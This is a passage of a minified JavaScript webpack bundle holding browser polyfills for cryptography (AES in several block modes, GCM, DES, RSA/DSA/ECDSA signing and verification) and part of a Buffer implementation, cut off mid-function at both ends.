x=_-w,S=y[x-(w%4?0:4)];D[w]=w<4||x<=4?S:Q.INV_SUB_MIX[0][Q.SBOX[S>>>24]]^Q.INV_SUB_MIX[1][Q.SBOX[S>>>16&255]]^Q.INV_SUB_MIX[2][Q.SBOX[S>>>8&255]]^Q.INV_SUB_MIX[3][Q.SBOX[255&S]]}this._nRounds=b,this._keySchedule=y,this._invKeySchedule=D},F.prototype.encryptBlockRaw=function(E){return ae(E=j(E),this._keySchedule,Q.SUB_MIX,Q.SBOX,this._nRounds)},F.prototype.encryptBlock=function(E){var g=this.encryptBlockRaw(E),b=ie.allocUnsafe(16);return b.writeUInt32BE(g[0],0),b.writeUInt32BE(g[1],4),b.writeUInt32BE(g[2],8),b.writeUInt32BE(g[3],12),b},F.prototype.decryptBlock=function(E){var g=(E=j(E))[1];E[1]=E[3],E[3]=g;var b=ae(E,this._invKeySchedule,Q.INV_SUB_MIX,Q.INV_SBOX,this._nRounds),_=ie.allocUnsafe(16);return _.writeUInt32BE(b[0],0),_.writeUInt32BE(b[3],4),_.writeUInt32BE(b[2],8),_.writeUInt32BE(b[1],12),_},F.prototype.scrub=function(){$(this._keySchedule),$(this._invKeySchedule),$(this._key)},Pe.exports.AES=F},4661:(Pe,we,de)=>{var ie=de(5461),j=de(265).Buffer,$=de(4003),ae=de(2270),I=de(3486),Q=de(7110),F=de(7841);function b(_,y,M,p){$.call(this);var D=j.alloc(4,0);this._cipher=new ie.AES(y);var w=this._cipher.encryptBlock(D);this._ghash=new I(w),M=function g(_,y,M){if(12===y.length)return _._finID=j.concat([y,j.from([0,0,0,1])]),j.concat([y,j.from([0,0,0,2])]);var p=new I(M),D=y.length,w=D%16;p.update(y),w&&p.update(j.alloc(w=16-w,0)),p.update(j.alloc(8,0));var x=8*D,S=j.alloc(8);S.writeUIntBE(x,0,8),p.update(S),_._finID=p.state;var O=j.from(_._finID);return F(O),O}(this,M,w),this._prev=j.from(M),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=p,this._alen=0,this._len=0,this._mode=_,this._authTag=null,this._called=!1}ae(b,$),b.prototype._update=function(_){if(!this._called&&this._alen){var y=16-this._alen%16;y<16&&(y=j.alloc(y,0),this._ghash.update(y))}this._called=!0;var M=this._mode.encrypt(this,_);return this._ghash.update(this._decrypt?_:M),this._len+=_.length,M},b.prototype._final=function(){if(this._decrypt&&!this._authTag)throw new Error("Unsupported state or unable to authenticate data");var _=Q(this._ghash.final(8*this._alen,8*this._len),this._cipher.encryptBlock(this._finID));if(this._decrypt&&function E(_,y){var M=0;_.length!==y.length&&M++;for(var p=Math.min(_.length,y.length),D=0;D<p;++D)M+=_[D]^y[D];return M}(_,this._authTag))throw new Error("Unsupported state or unable to authenticate data");this._authTag=_,this._cipher.scrub()},b.prototype.getAuthTag=function(){if(this._decrypt||!j.isBuffer(this._authTag))throw new Error("Attempting to get auth tag in unsupported state");return this._authTag},b.prototype.setAuthTag=function(y){if(!this._decrypt)throw new Error("Attempting to set auth tag in unsupported state");this._authTag=y},b.prototype.setAAD=function(y){if(this._called)throw new Error("Attempting to set AAD in unsupported state");this._ghash.update(y),this._alen+=y.length},Pe.exports=b},8931:(Pe,we,de)=>{var ie=de(1835),j=de(7869),$=de(4946);we.createCipher=we.Cipher=ie.createCipher,we.createCipheriv=we.Cipheriv=ie.createCipheriv,we.createDecipher=we.Decipher=j.createDecipher,we.createDecipheriv=we.Decipheriv=j.createDecipheriv,we.listCiphers=we.getCiphers=function ae(){return Object.keys($)}},7869:(Pe,we,de)=>{var ie=de(4661),j=de(265).Buffer,$=de(848),ae=de(701),I=de(4003),Q=de(5461),F=de(1851);function g(p,D,w){I.call(this),this._cache=new b,this._last=void 0,this._cipher=new Q.AES(D),this._prev=j.from(w),this._mode=p,this._autopadding=!0}function b(){this.cache=j.allocUnsafe(0)}function y(p,D,w){var x=$[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof w&&(w=j.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);if("string"==typeof D&&(D=j.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);return"stream"===x.type?new ae(x.module,D,w,!0):"auth"===x.type?new ie(x.module,D,w,!0):new g(x.module,D,w)}de(2270)(g,I),g.prototype._update=function(p){this._cache.add(p);for(var D,w,x=[];D=this._cache.get(this._autopadding);)w=this._mode.decrypt(this,D),x.push(w);return j.concat(x)},g.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return function _(p){var D=p[15];if(D<1||D>16)throw new Error("unable to decrypt data");for(var w=-1;++w<D;)if(p[w+(16-D)]!==D)throw new Error("unable to decrypt data");if(16!==D)return p.slice(0,16-D)}(this._mode.decrypt(this,p));if(p)throw new Error("data not multiple of block length")},g.prototype.setAutoPadding=function(p){return this._autopadding=!!p,this},b.prototype.add=function(p){this.cache=j.concat([this.cache,p])},b.prototype.get=function(p){var D;if(p){if(this.cache.length>16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D}else if(this.cache.length>=16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D;return null},b.prototype.flush=function(){if(this.cache.length)return this.cache},we.createDecipher=function M(p,D){var w=$[p.toLowerCase()];if(!w)throw new TypeError("invalid suite type");var x=F(D,!1,w.key,w.iv);return y(p,x.key,x.iv)},we.createDecipheriv=y},1835:(Pe,we,de)=>{var ie=de(848),j=de(4661),$=de(265).Buffer,ae=de(701),I=de(4003),Q=de(5461),F=de(1851);function g(p,D,w){I.call(this),this._cache=new _,this._cipher=new Q.AES(D),this._prev=$.from(w),this._mode=p,this._autopadding=!0}de(2270)(g,I),g.prototype._update=function(p){this._cache.add(p);for(var D,w,x=[];D=this._cache.get();)w=this._mode.encrypt(this,D),x.push(w);return $.concat(x)};var b=$.alloc(16,16);function _(){this.cache=$.allocUnsafe(0)}function y(p,D,w){var x=ie[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof D&&(D=$.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);if("string"==typeof w&&(w=$.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);return"stream"===x.type?new ae(x.module,D,w):"auth"===x.type?new j(x.module,D,w):new g(x.module,D,w)}g.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return p=this._mode.encrypt(this,p),this._cipher.scrub(),p;if(!p.equals(b))throw this._cipher.scrub(),new Error("data not multiple of block length")},g.prototype.setAutoPadding=function(p){return this._autopadding=!!p,this},_.prototype.add=function(p){this.cache=$.concat([this.cache,p])},_.prototype.get=function(){if(this.cache.length>15){var p=this.cache.slice(0,16);return this.cache=this.cache.slice(16),p}return null},_.prototype.flush=function(){for(var p=16-this.cache.length,D=$.allocUnsafe(p),w=-1;++w<p;)D.writeUInt8(p,w);return $.concat([this.cache,D])},we.createCipheriv=y,we.createCipher=function M(p,D){var w=ie[p.toLowerCase()];if(!w)throw new TypeError("invalid suite type");var x=F(D,!1,w.key,w.iv);return y(p,x.key,x.iv)}},3486:(Pe,we,de)=>{var ie=de(265).Buffer,j=ie.alloc(16,0);function ae(Q){var F=ie.allocUnsafe(16);return F.writeUInt32BE(Q[0]>>>0,0),F.writeUInt32BE(Q[1]>>>0,4),F.writeUInt32BE(Q[2]>>>0,8),F.writeUInt32BE(Q[3]>>>0,12),F}function I(Q){this.h=Q,this.state=ie.alloc(16,0),this.cache=ie.allocUnsafe(0)}I.prototype.ghash=function(Q){for(var F=-1;++F<Q.length;)this.state[F]^=Q[F];this._multiply()},I.prototype._multiply=function(){for(var E,b,Q=function $(Q){return[Q.readUInt32BE(0),Q.readUInt32BE(4),Q.readUInt32BE(8),Q.readUInt32BE(12)]}(this.h),F=[0,0,0,0],_=-1;++_<128;){for(0!=(this.state[~~(_/8)]&1<<7-_%8)&&(F[0]^=Q[0],F[1]^=Q[1],F[2]^=Q[2],F[3]^=Q[3]),b=0!=(1&Q[3]),E=3;E>0;E--)Q[E]=Q[E]>>>1|(1&Q[E-1])<<31;Q[0]=Q[0]>>>1,b&&(Q[0]=Q[0]^225<<24)}this.state=ae(F)},I.prototype.update=function(Q){this.cache=ie.concat([this.cache,Q]);for(var F;this.cache.length>=16;)F=this.cache.slice(0,16),this.cache=this.cache.slice(16),this.ghash(F)},I.prototype.final=function(Q,F){return this.cache.length&&this.ghash(ie.concat([this.cache,j],16)),this.ghash(ae([0,Q,0,F])),this.state},Pe.exports=I},7841:Pe=>{Pe.exports=function we(de){for(var j,ie=de.length;ie--;){if(255!==(j=de.readUInt8(ie))){j++,de.writeUInt8(j,ie);break}de.writeUInt8(0,ie)}}},3e3:(Pe,we,de)=>{var ie=de(7110);we.encrypt=function(j,$){var ae=ie($,j._prev);return j._prev=j._cipher.encryptBlock(ae),j._prev},we.decrypt=function(j,$){var ae=j._prev;j._prev=$;var I=j._cipher.decryptBlock($);return ie(I,ae)}},9415:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(7110);function $(ae,I,Q){var F=I.length,E=j(I,ae._cache);return ae._cache=ae._cache.slice(F),ae._prev=ie.concat([ae._prev,Q?I:E]),E}we.encrypt=function(ae,I,Q){for(var E,F=ie.allocUnsafe(0);I.length;){if(0===ae._cache.length&&(ae._cache=ae._cipher.encryptBlock(ae._prev),ae._prev=ie.allocUnsafe(0)),!(ae._cache.length<=I.length)){F=ie.concat([F,$(ae,I,Q)]);break}F=ie.concat([F,$(ae,I.slice(0,E=ae._cache.length),Q)]),I=I.slice(E)}return F}},6616:(Pe,we,de)=>{var ie=de(265).Buffer;function j(ae,I,Q){for(var _,y,E=-1,b=0;++E<8;)b+=(128&(y=ae._cipher.encryptBlock(ae._prev)[0]^(_=I&1<<7-E?128:0)))>>E%8,ae._prev=$(ae._prev,Q?_:y);return b}function $(ae,I){var Q=ae.length,F=-1,E=ie.allocUnsafe(ae.length);for(ae=ie.concat([ae,ie.from([I])]);++F<Q;)E[F]=ae[F]<<1|ae[F+1]>>7;return E}we.encrypt=function(ae,I,Q){for(var F=I.length,E=ie.allocUnsafe(F),g=-1;++g<F;)E[g]=j(ae,I[g],Q);return E}},5927:(Pe,we,de)=>{var ie=de(265).Buffer;function j($,ae,I){var F=$._cipher.encryptBlock($._prev)[0]^ae;return $._prev=ie.concat([$._prev.slice(1),ie.from([I?ae:F])]),F}we.encrypt=function($,ae,I){for(var Q=ae.length,F=ie.allocUnsafe(Q),E=-1;++E<Q;)F[E]=j($,ae[E],I);return F}},6735:(Pe,we,de)=>{var ie=de(7110),j=de(265).Buffer,$=de(7841);function ae(Q){var F=Q._cipher.encryptBlockRaw(Q._prev);return $(Q._prev),F}we.encrypt=function(Q,F){var E=Math.ceil(F.length/16),g=Q._cache.length;Q._cache=j.concat([Q._cache,j.allocUnsafe(16*E)]);for(var b=0;b<E;b++){var _=ae(Q),y=g+16*b;Q._cache.writeUInt32BE(_[0],y+0),Q._cache.writeUInt32BE(_[1],y+4),Q._cache.writeUInt32BE(_[2],y+8),Q._cache.writeUInt32BE(_[3],y+12)}var M=Q._cache.slice(0,F.length);return Q._cache=Q._cache.slice(F.length),ie(F,M)}},8564:(Pe,we)=>{we.encrypt=function(de,ie){return de._cipher.encryptBlock(ie)},we.decrypt=function(de,ie){return de._cipher.decryptBlock(ie)}},848:(Pe,we,de)=>{var ie={ECB:de(8564),CBC:de(3e3),CFB:de(9415),CFB8:de(5927),CFB1:de(6616),OFB:de(5651),CTR:de(6735),GCM:de(6735)},j=de(4946);for(var $ in j)j[$].module=ie[j[$].mode];Pe.exports=j},5651:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(7110);function $(ae){return ae._prev=ae._cipher.encryptBlock(ae._prev),ae._prev}we.encrypt=function(ae,I){for(;ae._cache.length<I.length;)ae._cache=ie.concat([ae._cache,$(ae)]);var Q=ae._cache.slice(0,I.length);return ae._cache=ae._cache.slice(I.length),j(I,Q)}},701:(Pe,we,de)=>{var ie=de(5461),j=de(265).Buffer,$=de(4003);function I(Q,F,E,g){$.call(this),this._cipher=new ie.AES(F),this._prev=j.from(E),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=g,this._mode=Q}de(2270)(I,$),I.prototype._update=function(Q){return this._mode.encrypt(this,Q,this._decrypt)},I.prototype._final=function(){this._cipher.scrub()},Pe.exports=I},4271:(Pe,we,de)=>{var ie=de(928),j=de(8931),$=de(848),ae=de(8156),I=de(1851);function E(_,y,M){if(_=_.toLowerCase(),$[_])return j.createCipheriv(_,y,M);if(ae[_])return new ie({key:y,iv:M,mode:_});throw new TypeError("invalid suite type")}function g(_,y,M){if(_=_.toLowerCase(),$[_])return j.createDecipheriv(_,y,M);if(ae[_])return new ie({key:y,iv:M,mode:_,decrypt:!0});throw new TypeError("invalid suite type")}we.createCipher=we.Cipher=function Q(_,y){var M,p;if(_=_.toLowerCase(),$[_])M=$[_].key,p=$[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");M=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,M,p);return E(_,D.key,D.iv)},we.createCipheriv=we.Cipheriv=E,we.createDecipher=we.Decipher=function F(_,y){var M,p;if(_=_.toLowerCase(),$[_])M=$[_].key,p=$[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");M=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,M,p);return g(_,D.key,D.iv)},we.createDecipheriv=we.Decipheriv=g,we.listCiphers=we.getCiphers=function b(){return Object.keys(ae).concat(j.getCiphers())}},928:(Pe,we,de)=>{var ie=de(4003),j=de(1462),$=de(2270),ae=de(265).Buffer,I={"des-ede3-cbc":j.CBC.instantiate(j.EDE),"des-ede3":j.EDE,"des-ede-cbc":j.CBC.instantiate(j.EDE),"des-ede":j.EDE,"des-cbc":j.CBC.instantiate(j.DES),"des-ecb":j.DES};function Q(F){ie.call(this);var b,E=F.mode.toLowerCase(),g=I[E];b=F.decrypt?"decrypt":"encrypt";var _=F.key;ae.isBuffer(_)||(_=ae.from(_)),("des-ede"===E||"des-ede-cbc"===E)&&(_=ae.concat([_,_.slice(0,8)]));var y=F.iv;ae.isBuffer(y)||(y=ae.from(y)),this._des=g.create({key:_,iv:y,type:b})}I.des=I["des-cbc"],I.des3=I["des-ede3-cbc"],Pe.exports=Q,$(Q,ie),Q.prototype._update=function(F){return ae.from(this._des.update(F))},Q.prototype._final=function(){return ae.from(this._des.final())}},8156:(Pe,we)=>{we["des-ecb"]={key:8,iv:0},we["des-cbc"]=we.des={key:8,iv:8},we["des-ede3-cbc"]=we.des3={key:24,iv:8},we["des-ede3"]={key:24,iv:0},we["des-ede-cbc"]={key:16,iv:8},we["des-ede"]={key:16,iv:0}},2005:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(9423),$=de(2419);function I(F){var g,E=F.modulus.byteLength();do{g=new j($(E))}while(g.cmp(F.modulus)>=0||!g.umod(F.prime1)||!g.umod(F.prime2));return g}function Q(F,E){var g=function ae(F){var E=I(F);return{blinder:E.toRed(j.mont(F.modulus)).redPow(new j(F.publicExponent)).fromRed(),unblinder:E.invm(F.modulus)}}(E),b=E.modulus.byteLength(),_=new j(F).mul(g.blinder).umod(E.modulus),y=_.toRed(j.mont(E.prime1)),M=_.toRed(j.mont(E.prime2)),p=E.coefficient,D=E.prime1,w=E.prime2,x=y.redPow(E.exponent1).fromRed(),S=M.redPow(E.exponent2).fromRed(),O=x.isub(S).imul(p).umod(D).imul(w);return S.iadd(O).imul(g.unblinder).umod(E.modulus).toArrayLike(ie,"be",b)}Q.getr=I,Pe.exports=Q},2196:(Pe,we,de)=>{"use strict";Pe.exports=de(5207)},9494:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(2161),$=de(4539),ae=de(2270),I=de(2378),Q=de(1926),F=de(5207);function E(y){$.Writable.call(this);var M=F[y];if(!M)throw new Error("Unknown message digest");this._hashType=M.hash,this._hash=j(M.hash),this._tag=M.id,this._signType=M.sign}function g(y){$.Writable.call(this);var M=F[y];if(!M)throw new Error("Unknown message digest");this._hash=j(M.hash),this._tag=M.id,this._signType=M.sign}function b(y){return new E(y)}function _(y){return new g(y)}Object.keys(F).forEach(function(y){F[y].id=ie.from(F[y].id,"hex"),F[y.toLowerCase()]=F[y]}),ae(E,$.Writable),E.prototype._write=function(M,p,D){this._hash.update(M),D()},E.prototype.update=function(M,p){return this._hash.update("string"==typeof M?ie.from(M,p):M),this},E.prototype.sign=function(M,p){this.end();var D=this._hash.digest(),w=I(D,M,this._hashType,this._signType,this._tag);return p?w.toString(p):w},ae(g,$.Writable),g.prototype._write=function(M,p,D){this._hash.update(M),D()},g.prototype.update=function(M,p){return this._hash.update("string"==typeof M?ie.from(M,p):M),this},g.prototype.verify=function(M,p,D){var w="string"==typeof p?ie.from(p,D):p;this.end();var x=this._hash.digest();return Q(w,x,M,this._signType,this._tag)},Pe.exports={Sign:b,Verify:_,createSign:b,createVerify:_}},2378:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4295),$=de(2005),ae=de(1875).ec,I=de(9423),Q=de(3262),F=de(1308);function M(S,O,U,K){if((S=ie.from(S.toArray())).length<O.byteLength()){var ee=ie.alloc(O.byteLength()-S.length);S=ie.concat([ee,S])}var se=U.length,ve=function D(S,O){S=(S=p(S,O)).mod(O);var U=ie.from(S.toArray());if(U.length<O.byteLength()){var K=ie.alloc(O.byteLength()-U.length);U=ie.concat([K,U])}return U}(U,O),le=ie.alloc(se);le.fill(1);var ye=ie.alloc(se);return ye=j(K,ye).update(le).update(ie.from([0])).update(S).update(ve).digest(),le=j(K,ye).update(le).digest(),{k:ye=j(K,ye).update(le).update(ie.from([1])).update(S).update(ve).digest(),v:le=j(K,ye).update(le).digest()}}function p(S,O){var U=new I(S),K=(S.length<<3)-O.bitLength();return K>0&&U.ishrn(K),U}function w(S,O,U){var K,ee;do{for(K=ie.alloc(0);8*K.length<S.bitLength();)O.v=j(U,O.k).update(O.v).digest(),K=ie.concat([K,O.v]);ee=p(K,S),O.k=j(U,O.k).update(O.v).update(ie.from([0])).digest(),O.v=j(U,O.k).update(O.v).digest()}while(-1!==ee.cmp(S));return ee}function x(S,O,U,K){return S.toRed(I.mont(U)).redPow(O).fromRed().mod(K)}Pe.exports=function g(S,O,U,K,ee){var se=Q(O);if(se.curve){if("ecdsa"!==K&&"ecdsa/rsa"!==K)throw new Error("wrong private key type");return function b(S,O){var U=F[O.curve.join(".")];if(!U)throw new Error("unknown curve "+O.curve.join("."));var se=new ae(U).keyFromPrivate(O.privateKey).sign(S);return ie.from(se.toDER())}(S,se)}if("dsa"===se.type){if("dsa"!==K)throw new Error("wrong private key type");return function _(S,O,U){for(var ye,K=O.params.priv_key,ee=O.params.p,se=O.params.q,ve=O.params.g,le=new I(0),z=p(S,se).mod(se),l=!1,f=M(K,se,S,U);!1===l;)le=x(ve,ye=w(se,f,U),ee,se),0===(l=ye.invm(se).imul(z.add(K.mul(le))).mod(se)).cmpn(0)&&(l=!1,le=new I(0));return function y(S,O){S=S.toArray(),O=O.toArray(),128&S[0]&&(S=[0].concat(S)),128&O[0]&&(O=[0].concat(O));var K=[48,S.length+O.length+4,2,S.length];return K=K.concat(S,[2,O.length],O),ie.from(K)}(le,l)}(S,se,U)}if("rsa"!==K&&"ecdsa/rsa"!==K)throw new Error("wrong private key type");if(void 0!==O.padding&&1!==O.padding)throw new Error("illegal or unsupported padding mode");S=ie.concat([ee,S]);for(var ve=se.modulus.byteLength(),le=[0,1];S.length+le.length+1<ve;)le.push(255);le.push(0);for(var ye=-1;++ye<S.length;)le.push(S[ye]);return $(le,se)},Pe.exports.getKey=M,Pe.exports.makeKey=w},1926:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(9423),$=de(1875).ec,ae=de(3262),I=de(1308);function g(b,_){if(b.cmpn(0)<=0)throw new Error("invalid sig");if(b.cmp(_)>=0)throw new Error("invalid sig")}Pe.exports=function Q(b,_,y,M,p){var D=ae(y);if("ec"===D.type){if("ecdsa"!==M&&"ecdsa/rsa"!==M)throw new Error("wrong public key type");return function F(b,_,y){var M=I[y.data.algorithm.curve.join(".")];if(!M)throw new Error("unknown curve "+y.data.algorithm.curve.join("."));return new $(M).verify(_,b,y.data.subjectPrivateKey.data)}(b,_,D)}if("dsa"===D.type){if("dsa"!==M)throw new Error("wrong public key type");return function E(b,_,y){var M=y.data.p,p=y.data.q,D=y.data.g,w=y.data.pub_key,x=ae.signature.decode(b,"der"),S=x.s,O=x.r;g(S,p),g(O,p);var U=j.mont(M),K=S.invm(p);return 0===D.toRed(U).redPow(new j(_).mul(K).mod(p)).fromRed().mul(w.toRed(U).redPow(O.mul(K).mod(p)).fromRed()).mod(M).mod(p).cmp(O)}(b,_,D)}if("rsa"!==M&&"ecdsa/rsa"!==M)throw new Error("wrong public key type");_=ie.concat([p,_]);for(var w=D.modulus.byteLength(),x=[1],S=0;_.length+x.length+2<w;)x.push(255),S+=1;x.push(0);for(var O=-1;++O<_.length;)x.push(_[O]);x=ie.from(x);var U=j.mont(D.modulus);b=(b=new j(b).toRed(U)).redPow(new j(D.publicExponent)),b=ie.from(b.fromRed().toArray());var K=S<8?1:0;for(w=Math.min(b.length,x.length),b.length!==x.length&&(K=1),O=-1;++O<w;)K|=b[O]^x[O];return 0===K}},7110:(Pe,we,de)=>{var ie=de(5449).Buffer;Pe.exports=function($,ae){for(var I=Math.min($.length,ae.length),Q=new ie(I),F=0;F<I;++F)Q[F]=$[F]^ae[F];return Q}},5449:(Pe,we,de)=>{"use strict";const ie=de(9742),j=de(4794),$="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;we.Buffer=F,we.SlowBuffer=function S(Oe){return+Oe!=Oe&&(Oe=0),F.alloc(+Oe)},we.INSPECT_MAX_BYTES=50;const ae=2147483647;function Q(Oe){if(Oe>ae)throw new RangeError('The value "'+Oe+'" is invalid for option "size"');const Te=new Uint8Array(Oe);return Object.setPrototypeOf(Te,F.prototype),Te}function F(Oe,Te,Le){if("number"==typeof Oe){if("string"==typeof Te)throw new TypeError('The "string" argument must be of type string. Received type number');return _(Oe)}return E(Oe,Te,Le)}function E(Oe,Te,Le){if("string"==typeof Oe)return function y(Oe,Te){if(("string"!=typeof Te||""===Te)&&(Te="utf8"),!F.isEncoding(Te))throw new TypeError("Unknown encoding: "+Te);const Le=0|O(Oe,Te);let $e=Q(Le);const st=$e.write(Oe,Te);return st!==Le&&($e=$e.slice(0,st)),$e}(Oe,Te);if(ArrayBuffer.isView(Oe))return function p(Oe){if(lt(Oe,Uint8Array)){const Te=new Uint8Array(Oe);return D(Te.buffer,Te.byteOffset,Te.byteLength)}return M(Oe)}(Oe);if(null==Oe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe);if(lt(Oe,ArrayBuffer)||Oe&&lt(Oe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(lt(Oe,SharedArrayBuffer)||Oe&&lt(Oe.buffer,SharedArrayBuffer)))return D(Oe,Te,Le);if("number"==typeof Oe)throw new TypeError('The "value" argument must not be of type number. Received type number');const $e=Oe.valueOf&&Oe.valueOf();if(null!=$e&&$e!==Oe)return F.from($e,Te,Le);const st=function w(Oe){if(F.isBuffer(Oe)){const Te=0|x(Oe.length),Le=Q(Te);return 0===Le.length||Oe.copy(Le,0,0,Te),Le}return void 0!==Oe.length?"number"!=typeof Oe.length||ft(Oe.length)?Q(0):M(Oe):"Buffer"===Oe.type&&Array.isArray(Oe.data)?M(Oe.data):void 0}(Oe);if(st)return st;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof Oe[Symbol.toPrimitive])return F.from(Oe[Symbol.toPrimitive]("string"),Te,Le);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe)}function g(Oe){if("number"!=typeof Oe)throw new TypeError('"size" argument must be of type number');if(Oe<0)throw new RangeError('The value "'+Oe+'" is invalid for option "size"')}function _(Oe){return g(Oe),Q(Oe<0?0:0|x(Oe))}function M(Oe){const Te=Oe.length<0?0:0|x(Oe.length),Le=Q(Te);for(let $e=0;$e<Te;$e+=1)Le[$e]=255&Oe[$e];return Le}function D(Oe,Te,Le){if(Te<0||Oe.byteLength<Te)throw new RangeError('"offset" is outside of buffer bounds');if(Oe.byteLength<Te+(Le||0))throw new RangeError('"length" is outside of buffer bounds');let $e;return $e=void 0===Te&&void 0===Le?new Uint8Array(Oe):void 0===Le?new Uint8Array(Oe,Te):new Uint8Array(Oe,Te,Le),Object.setPrototypeOf($e,F.prototype),$e}function x(Oe){if(Oe>=ae)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+ae.toString(16)+" bytes");return 0|Oe}function O(Oe,Te){if(F.isBuffer(Oe))return Oe.length;if(ArrayBuffer.isView(Oe)||lt(Oe,ArrayBuffer))return Oe.byteLength;if("string"!=typeof Oe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof Oe);const Le=Oe.length,$e=arguments.length>2&&!0===arguments[2];if(!$e&&0===Le)return 0;let st=!1;for(;;)switch(Te){case"ascii":case"latin1":case"binary":return Le;case"utf8":case"utf-8":return rt(Oe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Le;case"hex":return Le>>>1;case"base64":return ht(Oe).length;default:if(st)return $e?-1:rt(Oe).length;Te=(""+Te).toLowerCase(),st=!0}}function U(Oe,Te,Le){let $e=!1;if((void 0===Te||Te<0)&&(Te=0),Te>this.length||((void 0===Le||Le>this.length)&&(Le=this.length),Le<=0)||(Le>>>=0)<=(Te>>>=0))return"";for(Oe||(Oe="utf8");;)switch(Oe){case"hex":return L(this,Te,Le);case"utf8":case"utf-8":return A(this,Te,Le);case"ascii":return G(this,Te,Le);case"latin1":case"binary":return X(this,Te,Le);case"base64":return f(this,Te,Le);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return h(this,Te,Le);default:if($e)throw new TypeError("Unknown encoding: "+Oe);Oe=(Oe+"").toLowerCase(),$e=!0}}function K(Oe,Te,Le){const $e=Oe[Te];Oe[Te]=Oe[Le],Oe[Le]=$e}function ee(Oe,Te,Le,$e,st){if(0===Oe.length)return-1;if("string"==typeof Le?($e=Le,Le=0):Le>2147483647?Le=2147483647:Le<-2147483648&&(Le=-2147483648),ft(Le=+Le)&&(Le=st?0:Oe.length-1),Le<0&&(Le=Oe.length+Le),Le>=Oe.length){if(st)return-1;Le=Oe.length-1}else if(Le<0){if(!st)return-1;Le=0}if("string"==typeof Te&&(Te=F.from(Te,$e)),F.isBuffer(Te))return 0===Te.length?-1:se(Oe,Te,Le,$e,st);if("number"==typeof Te)return Te&=255,"function"==typeof Uint8Array.prototype.indexOf?st?Uint8Array.prototype.indexOf.call(Oe,Te,Le):Uint8Array.prototype.lastIndexOf.call(Oe,Te,Le):se(Oe,[Te],Le,$e,st);throw new TypeError("val must be string, number or Buffer")}function se(Oe,Te,Le,$e,st){let Ft,xt=1,pt=Oe.length,vt=Te.length;if(void 0!==$e&&("ucs2"===($e=String($e).toLowerCase())||"ucs-2"===$e||"utf16le"===$e||"utf-16le"===$e)){if(Oe.length<2||Te.length<2)return-1;xt=2,pt/=2,vt/=2,Le/=2}function Wi(zt,pa){return 1===xt?zt[pa]:zt.readUInt16BE(pa*xt)}if(st){let zt=-1;for(Ft=Le;Ft<pt;Ft++)if(Wi(Oe,Ft)===Wi(Te,-1===zt?0:Ft-zt)){if(-1===zt&&(zt=Ft),Ft-zt+1===vt)return zt*xt}else-1!==zt&&(Ft-=Ft-zt),zt=-1}else for(Le+vt>pt&&(Le=pt-vt),Ft=Le;Ft>=0;Ft--){let zt=!0;for(let pa=0;pa<vt;pa++)if(Wi(Oe,Ft+pa)!==Wi(Te,pa)){zt=!1;break}if(zt)return Ft}return-1}function ve(Oe,Te,Le,$e){Le=Number(Le)||0;const st=Oe.length-Le;$e?($e=Number($e))>st&&($e=st):$e=st;const xt=Te.length;let pt;for($e>xt/2&&($e=xt/2),pt=0;pt<$e;++pt){const vt=parseInt(Te.substr(2*pt,2),16);if(ft(vt))return pt;Oe[Le+pt]=vt}return pt}function le(Oe,Te,Le,$e){return mt(rt(Te,Oe.length-Le),Oe,Le,$e)}function ye(Oe,Te,Le,$e){return mt(function Ge(Oe){const Te=[];for(let Le=0;Le<Oe.length;++Le)Te.push(255&Oe.charCodeAt(Le));return Te}(Te),Oe,Le,$e)}function z(Oe,Te,Le,$e){return mt(ht(Te),Oe,Le,$e)}function l(Oe,Te,Le,$e){return mt(function Qe(Oe,Te){let Le,$e,st;const xt=[];for(let pt=0;pt<Oe.length&&!((Te-=2)<0);++pt)Le=Oe.charCodeAt(pt),$e=Le>>8,st=Le%256,xt.push(st),xt.push($e);return xt}(Te,Oe.length-Le),Oe,Le,$e)}function f(Oe,Te,Le){return ie.fromByteArray(0===Te&&Le===Oe.length?Oe:Oe.slice(Te,Le))}function A(Oe,Te,Le){Le=Math.min(Oe.length,Le);const $e=[];let st=Te;for(;st<Le;){const xt=Oe[st];let pt=null,vt=xt>239?4:xt>223?3:xt>191?2:1;if(st+vt<=Le){let Wi,Ft,zt,pa;switch(vt){case 1:xt<128&&(pt=xt);break;case 2:Wi=Oe[st+1],128==(192&Wi)&&(pa=(31&xt)<<6|63&Wi,pa>127&&(pt=pa));break;case 3:Wi=Oe[st+1],Ft=Oe[st+2],128==(192&Wi)&&128==(192&Ft)&&(pa=(15&xt)<<12|(63&Wi)<<6|63&Ft,pa>2047&&(pa<55296||pa>57343)&&(pt=pa));break;case 